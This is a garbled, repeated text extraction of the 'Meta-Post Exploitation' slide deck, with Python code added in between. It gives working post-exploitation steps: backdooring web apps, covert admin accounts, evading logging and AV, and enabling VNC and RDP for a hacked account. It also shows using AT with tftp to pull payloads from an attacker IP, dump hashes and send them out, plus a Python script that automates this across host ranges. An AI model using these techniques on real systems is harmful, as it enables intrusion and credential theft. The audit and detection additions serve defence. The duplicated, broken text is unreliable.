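    (minutes_ahead - 1) and minutes_ahead minutes; +0 would already be past.
    """
    if minutes_ahead < 1:
        raise ValueError("AT needs a time in the future")
    return (target_now + timedelta(minutes=minutes_ahead)).strftime("%H:%M")


def build_at_sequence(net_time_output, attacker_ip, payload="e.bat", lead=1):
    """Command lines for one host: fetch the batch file, then run it a minute later.

    Both jobs run as LocalSystem by default (slide 59), so the batch file needs
    no further privilege escalation.
    """
    host, now = parse_net_time(net_time_output)
    fetch = 'at \\\\%s %s "tftp -i %s GET %s"' % (host, at_clock(now, lead), attacker_ip, payload)
    run = 'at \\\\%s %s "%s"' % (host, at_clock(now, lead + 1), payload)
    return [fetch, run]


def build_for_range(net_time_by_host, attacker_ip):
    """Mass-automation variant: one schedule per host, each from its own clock.

    net_time_by_host maps a host name to the raw `net time` output captured for
    it.  Hosts whose output does not parse are returned in `failed`, not dropped.
    """
    plan, failed = {}, []
    for host, output in net_time_by_host.items():
        try:
            plan[host] = build_at_sequence(output, attacker_ip)
        except ValueError:
            failed.append(host)
    return plan, failed


if __name__ == "__main__":
    for line in build_at_sequence(SAMPLE_NET_TIME, "10.0.0.5"):
        print(line)
```

Two details worth keeping from this: the schedule must come from the target's clock, since a host whose clock is skewed from yours would otherwise get a job in the past or an hour away, and a parse failure has to stop the run for that host rather than fall through to a guessed time.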

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
– NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
– SE_IMPERSONATE_NAME
– SE_TCB_NAME
– SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts
• Goals
– Penetrate as many systems as possible with little interaction and in a short time
– Ease of use, re-use
– Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 19: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 20: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

• Take concept to another level
  – Add a decoder to web app
  – Look for a "trigger" string combination in form fields
  – If Name = John Smith and Age = 42 then execute contents of Address field
  – URL encode form entries containing commands
  – Have identifier "stub" in encoded data for app to find

Slide 27

Persistence

• Mixing Stealth with Persistence
  – Further encoding
  – Take entries from all fields
  – Concat them
  – "Decode" commands
  – Rotational Ciphers (rot13, Caesar)
  – Even more complex obfuscation

Slide 28

Persistence

• Covert Accounts
  – Add an account, re-enable
  – Modify local account policies to allow access
    • Ex: SUPPORT_3848576b1, guest
  – Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files, new accounts
  – Unlikely to be discovered

Slide 29

• DEMOS

Slide 30

Stealth: Evading Detection

Slide 31

Stealth: Evading Detection

• Hiding your activity
  – From:
    • IDS
    • AV
    • LOGGING
    • Suspicious users & admins
    • Firewalls
    • Process listing

Slide 32

Stealth: Evading Detection

• Why Stealth?
  – If you get caught you get stopped
  – The longer you can operate undetected, the more you can accomplish
  – Admins won't fix problems they don't know exist (helps persistence)
  – On a pen test you should also be testing the organization's detection and response capabilities

Slide 33

Stealth: Evading Detection

• Goals
  – Keep system operable
    • If it breaks you can't use it
    • Someone will come fix it
  – Operate without fear of detection
  – Robustness
    • Hiding shouldn't require constant attention
  – DON'T LOOK MALICIOUS

Slide 34

Stealth: Evading Detection

• Manual / Existing Tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode Encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels, Steganography
  – Anti-analysis, anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research

Slide 35

Stealth: Evading Detection

• Different Perspective
  – DON'T BE AN ANOMALY
  – Hide in plain sight
    • Many tools have ONLY malicious uses
    • Make your intent hard to determine
  – Be noisy on one to divert attention from another

Slide 36

Stealth: Evading Detection

• Different Perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See Tactical Exploitation talk
    • IDSs can't see normal behavior that is malicious

Slide 37

Stealth: Evading Detection

• Using Windows security objects for stealth
  – Auditing of Securable Objects is controlled by SACLs
  – Null SACL = No Auditing = No Logs

Slide 38

• DEMOS
  – Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

• It's not always about ROOT
• Look like someone else
  – Use the credentials/access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior

Slide 41

User Identity Theft

• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change Identity
    • Hijack credentials/sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system

Slide 42

User Identity Theft

• Existing tools
  – Incognito (metasploit)
    • Enumerate, hijack tokens
  – FU/FUTo
    • Enable SYSTEM privileges
    • Change process privileges, DKOM
  – SU, SUDO, KSU
  – Process injection
  – Hijack domain credentials

Slide 43

User Identity Theft

Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs, Oh My!

• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs FUto

Slide 44

• DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities
• Goals
  – Support all Post-Exploitation activities
  – Disabling detection technologies
  – Enabling insecure or easy-to-use access software

Slide 47

Feature Modification

• Feature Modification is Basically Securable Object Manipulation
  – Remember all those Tokens and Security Descriptors?
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth / Persistence requirements
    • May make it more advantageous to use custom tools
  – Access Objects programmatically
  – Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
  – PsExec: It's still cool (Thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying Local Security Policies

Slide 49

Feature Modification

• Enabling psexec
  – Psexec was a great, awesome remote shell/command tool
  – Everybody now disables clipbook, which psexec requires, l4m3
  – Let's re-enable it

Slide 50

Feature Modification

• Enabling psexec
• Use the service control tool sc.exe
  – net use \\target\ipc$ /user:username userpassword
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv

Slide 51

Feature Modification

• Enabling VNC (from command line)
  – Go get VNC (check out guhnu)
  – Make a folder on the target for the vnc files
  – Copy the following files to target folder
    • WinVNC.exe
    • vnc.reg
    • VNCHooks.dll
    • omnithread_rt.dll
  – regedit -s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"

vnc.reg file contents:

    [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
    "SocketConnect"=dword:00000001
    "AutoPortSelect"=dword:00000001
    "InputsEnabled"=dword:00000001
    "LocalInputsDisabled"=dword:00000000
    "IdleTimeout"=dword:00000000
    "QuerySetting"=dword:00000002
    "QueryTimeout"=dword:0000000a
    "PollUnderCursor"=dword:00000000
    "PollForeground"=dword:00000001
    "PollFullScreen"=dword:00000000
    "OnlyPollConsole"=dword:00000001
    "OnlyPollOnEvent"=dword:00000000
    "Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: System controlling access to security doors
  – No command line way of modifying the system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote desktop is fast and already a feature of the OS
  – However it's often disabled, maybe even by GPO

Slide 53

Feature Modification

• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:

    [Unicode]
    Unicode=yes
    [Version]
    signature="$CHICAGO$"
    Revision=1
    [Privilege Rights]
    seremoteinteractivelogonright = hacked_account
    seinteractivelogonright = hacked_account
    sedenyinteractivelogonright =
    sedenyremoteinteractivelogonright =
    sedenynetworklogonright =

  – This file will fix policy settings in your way
  – Change "hacked_account" to a real account

Slide 54

Feature Modification

• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000000
    "TSEnabled"=dword:00000001
    "TSUserEnabled"=dword:00000000

  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
    • secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /Force
    • net start "terminal services"
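
An audit for the policy and registry changes on slides 53 and 54, added as an example and not the talk's tooling: it parses a secedit-style export and a .reg fragment and reports cleared deny rights, interactive or remote logon rights granted outside an allowlist, and fDenyTSConnections set to 0. The baseline and allowlist are constructed; real secedit exports list accounts as *SID entries, which the checker accepts as well.

```python
TS_KEY = r'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server'
DENY_RIGHTS = ('sedenyinteractivelogonright',
               'sedenyremoteinteractivelogonright', 'sedenynetworklogonright')
GRANT_RIGHTS = ('seremoteinteractivelogonright', 'seinteractivelogonright')


def parse_ini(text):
    """INI/INF text -> {section: {key_lower: value}}. Keys are lower-cased:
    the format is case-insensitive and the slide writes the rights that way."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';'):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif current is not None and '=' in line:
            key, _, value = line.partition('=')
            sections[current][key.strip().lower()] = value.strip()
    return sections


def parse_reg(text):
    """.reg text -> {key_path: {value_name: value}}; dword: becomes int, any
    other value stays a string. Unquoted value names are accepted too."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('Windows Registry Editor'):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and '=' in line:
            name, _, value = line.partition('=')
            name, value = name.strip().strip('"'), value.strip()
            if value.lower().startswith('dword:'):
                keys[current][name] = int(value[6:], 16)
            else:
                keys[current][name] = value.strip('"')
    return keys


def accounts(value):
    """'a,b' or '*S-1-5-32-555,*S-1-5-32-544' -> set; empty means 'nobody'."""
    return {a.strip().lstrip('*') for a in value.split(',') if a.strip()}


def audit(inf_text, reg_text, allowed_remote):
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    rights = parse_ini(inf_text).get('Privilege Rights', {})
    # A deny right that is present but empty: every deny entry was removed.
    for right in DENY_RIGHTS:
        if right in rights and not accounts(rights[right]):
            findings.append(f'{right} cleared: no account is denied any more')
    # Interactive / remote-interactive logon granted outside the allowlist.
    for right in GRANT_RIGHTS:
        extra = accounts(rights.get(right, '')) - allowed_remote
        if extra:
            findings.append(f'{right} granted to {sorted(extra)}')
    # Terminal Server accepting connections.
    if parse_reg(reg_text).get(TS_KEY, {}).get('fDenyTSConnections') == 0:
        findings.append('fDenyTSConnections=0: Remote Desktop accepts connections')
    return findings


# The two files from slides 53-54, reproduced as constructed input.
FIX_TS_POLICY_INI = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
"""
ENABLE_TS_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""
# Constructed hardened baseline: Administrators (S-1-5-32-544) and Remote
# Desktop Users (S-1-5-32-555) may log on remotely, Guests (S-1-5-32-546)
# are denied network logon, and Remote Desktop is switched off.
BASELINE_INI = """\
[Privilege Rights]
SeRemoteInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-555
SeDenyNetworkLogonRight = *S-1-5-32-546
"""
BASELINE_REG = r"""[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000001
"""
ALLOWED_REMOTE = {'S-1-5-32-544', 'S-1-5-32-555'}
```

Run audit(FIX_TS_POLICY_INI, ENABLE_TS_REG, ALLOWED_REMOTE) to see the six findings the slide's two files produce; the baseline pair returns none.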

Slide 55

• DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• AT command schedules things to run at a specified time and date
  – Schedule service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled

    net use \\target\ipc$ password /user:username
    at \\target 12:00 pm command
    Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / Start Services
  – Transfer files
  – Adding users
  – Messing with the registry, policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT
  – Flow:
    • Establish authenticated session
    • Determine the time on the target
    • Pass commands to the target to be run 1 min from now
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time +1min) "tftp -i use GET e.bat"
  – at \\target (net time +2min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hashdumping tools and dumps hashes
    • Sends hashes identified by IP back to attacker host
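
A detection rule for the net use / at flow on slides 58 to 61, added as an example and not from the talk: it correlates a network logon (logon type 3, which an IPC$ session produces) with a scheduled-task creation by the same account on the same host within a few minutes. The pipe-separated record layout and the sample records are constructed; the event IDs 540/4624 (logon) and 602/4698 (scheduled task created) are the real Windows Security IDs for NT 5.x and Vista+ respectively.

```python
from datetime import datetime, timedelta

# Windows Security event IDs: successful logon and scheduled task created,
# for NT 5.x (540 / 602) and Vista and later (4624 / 4698).
LOGON_EVENTS = {540, 4624}
TASK_CREATED_EVENTS = {602, 4698}
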